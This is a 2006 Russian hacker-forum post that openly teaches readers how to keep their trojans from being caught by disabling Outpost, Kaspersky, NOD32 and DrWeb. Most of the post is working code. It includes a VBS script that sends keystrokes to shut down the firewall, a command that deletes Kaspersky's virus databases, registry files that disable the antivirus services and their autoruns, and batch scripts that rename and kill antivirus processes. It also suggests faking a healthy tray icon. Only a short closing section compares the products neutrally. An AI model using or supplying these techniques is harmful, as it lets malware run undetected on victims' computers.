Тема: streSS teSt AntiVirus'ов
Показать сообщение отдельно

  #2  
Старый 08.02.2006, 04:13
Elekt
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935

Репутация: 1202


Отправить сообщение для Elekt с помощью ICQ
По умолчанию
№_8_+++++++++++++..:: Умри, несчастный! ::.. +++++++++++++

УУу-Ха-ха!! Ща разомнемся.

Так, скомпилял ты трояна, но его палит антивирь? Или ты хочешь вырубить антивиря в компьтерном класе?
Щас рассмотрим, как это моно сбацать. Самые главные условия для таких действий - это админские или системные права.
Как это сделать - думай сам (разводи админа; ищи эксплоит).

Как оказалось, каждый из этих антивирусов уж слишком доверяет пользователю.

Предположим самый простой случай - антивирь без пароля.
Заставим выгружаться без нашей помощи (троян, IE, Opera).
Процесс авто-выгрузки инициализируется , к примеру, скриптом на Бейсике(или Джаве).
Сохрани эти строчки в текстовый файл и измени расширение на *.vbs
Бэйсик я не знаю, для полного счастья нехватает ещё мышиных операций.
Вот такой скриптик непринужденно отключит Ognitum Autpost:
Код:
       set WShell = CreateObject("WScript.Shell")
        WShell.Exec "C:\Program Files\Agnitum\Outpost Firewall\outpost.exe"
       WScript.Sleep 200
       WShell.AppActivate "Agnitum", TRUE
       WScript.Sleep 100
       WShell.SendKeys "{F10}{DOWN}{UP}{ENTER}"
       WScript.Sleep 100
       WShell.SendKeys "{ENTER}"
источник vbs-скрипта http://www.securitylab.ru/analytics/216375.php

Теперь обходим пароль.


=======AVP
Самый страшный враг АВП - он сам.
Для того, чтобы гигант антивирусной идустрии новил вирей - слишком уж много условий ему надо.
И в наших силах ему помешать!!!
После перезапуска\перезагрузки АВП устроит забастовку, если:
1) Найти и удалить ключ лицензии ( *.key ). Делов-то.
2) Попытаться удалить базы антивиря. Благо, они в гостевой папке!!!
Код:
del /f /q "C:\Documents and Settings\All Users\Application Data\Kaspersky Anti-Virus Personal Pro\5.0\Bases"
Загрука в АВП двойная - реестр+служба.
Если просто выгрузить, служба останется активной и будет килять всё, что её не понравиться АВТОМАТОМ.
Без всяких "Вы уверены?". РРРАЗ! И нету твоего трояна.
Идём через реестр.
Вот так запускается *.reg из консоли:
Код:
reg import 111.reg
Отключаем службу в реестре(измените на эти строки):
Пихаем следуюий код в *.reg файл:
Код:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kavsvc]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\kavsvc]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\kavsvc]
"Start"=dword:00000004
Отключаем шел-оболочку в реестре(испортить, удалить эту запись):
Код:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"KAVPersonal50"="\"C:\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus Personal Pro\\kav.exe\" /minimize"
Усё. После ребута - вы кАроль ))

Между прочим, если расковырять редактором длл-ки, можно заменить иконку в трее на вечно красную....
А постоянную защиту вырубить. Очень эФФектно смотриться - типа усё ок'ей, а антивирь на самом деле бамбук курит.
До рядового юзверя месяцами доходит, пока реальную заразу не зацепит где-нить.

....и против переименования своих файлов он тоже не возражает. А глючит потом сильно)
Зато профиль с настройками, пока не выгрузишь, не заменишь. Но эт нас не Астановит.
Профиль лежит тут "C:\Documents and Settings\All Users\Application Data\Kaspersky Anti-Virus Personal Pro\5.0\Policy"

=======NOD32

Нод обычно крячится, трюк с лиц.ключом здесь не применишь.
Базы здеся "C:\Program Files\ESET\updfiles"

Защита процесса в ноде хилая.
Загрука опять двойная - реестр+служба.
Процесс и оболочку мы уже можем вырубить taskkill'ом .
Защита одна и простая, как две копейки. Сервис, умирая, перезапускает себя =]
Переименуем nod32krn.exe в мусор и снова киляем... Красота )))
Даже перегруз не нужен.
Вот скрипт в *.bat
Код:
rename "C:\Program Files\ESET\nod32krn.exe" fucker.exe
rename "C:\Program Files\ESET\nod32kui.exe" fuck.exe
taskkill /IM nod32krn.exe /F /T
taskkill /IM nod32kui.exe /F /T
Отключаем службу в реестре(измените на эти строки):
Код:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NOD32krn]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\NOD32krn]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\NOD32krn]
"Start"=dword:00000004
Отключаем шел-оболочку в реестре(испортить, удалить эту запись):
Код:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"nod32kui"="\"C:\\Program Files\\Eset\\nod32kui.exe\" /WAITSERVICE"



=======DrWEB

Базы лежат прямо в папке вместе с антивирём "C:\Program Files\DrWeb"
Лицензионный ключ - ТАМ ЖЕ.

Я долго искал, как задать пароль на настройки. Такой функции нет. Уряяя!!!
Сервис и шел оболочка не защищены никак. Di!
Код:
taskkill /IM spidernt.exe /F /T
taskkill /IM spiderml.exe /F /T
taskkill /IM drwebscd.exe /F /T
Отключаем службу в реестре(измените на эти строки):
Код:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\spidernt]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\spidernt]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\spidernt]
"Start"=dword:00000004
Больше в реестре никто не живёт:
Код:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"DrWebScheduler"="C:\\Program Files\\DrWeb\\DRWEBSCD.EXE"
"SpIDerMail"="\"C:\\Program Files\\DrWeb\\spiderml.exe\""
"SpIDerNT"="C:\\PROGRA~1\\DrWeb\\spidernt.exe /agent"


№_9_+++++++++++++..:: Вскрытие показало ::.. +++++++++++++


=======AVP

Разработчики позаботились о безопасности лучше, чем в остальных антивирусах.
Уникальных технологий в нём реализовано заметно больше.
Скорость проверки вполне приемлима, антивирусная база одна из лучших.
Однако эвристика и эмулятор не самые лучшие.
Любит удалять файлы, вместо лечения.

=======NOD32
Средняя защищённость. Большая функциональность и оригинальное модульное исполнение.
Скорость проверки - самая высокая. Однако вирусов знает меньше всех.
Тем не менее эвристик и эмулятор позволяют ему очень уверенно определять заразу.
Сносно лечит файлы, умеет сканить сетевые диски. К типу винды не придераеться.

=======DrWEB
Защищён хуже всех. При этом находит больше всех вирусов.
Низкий показатель скорости работы несколько портит впечатление.
Доктор есть доктор - лечит заражённые файлы превосходно, в чём я не раз убеждался,
востанавливая инсталяторы с защитой по контрольной сумме.
Поддержка консольного и досового сканера пожалуй уникальна.
Не раз лечил винты нерадивым пользователям из командной строки.



....каждый выбирает антивирус по потребности. зачем тогда спорить? =]


Полезные ссылки:

1) http://www.webplanet.ru/news/securit.../euristic.html
2) http://www.izcity.com/data/security/index3.htm
3) http://www.disser.ru/library/12/347.htm
4) http://www.ampula.ru/rus/personal.php
Последний раз редактировалось Elekt; 10.02.2006 в 04:01..
 
Ответить с цитированием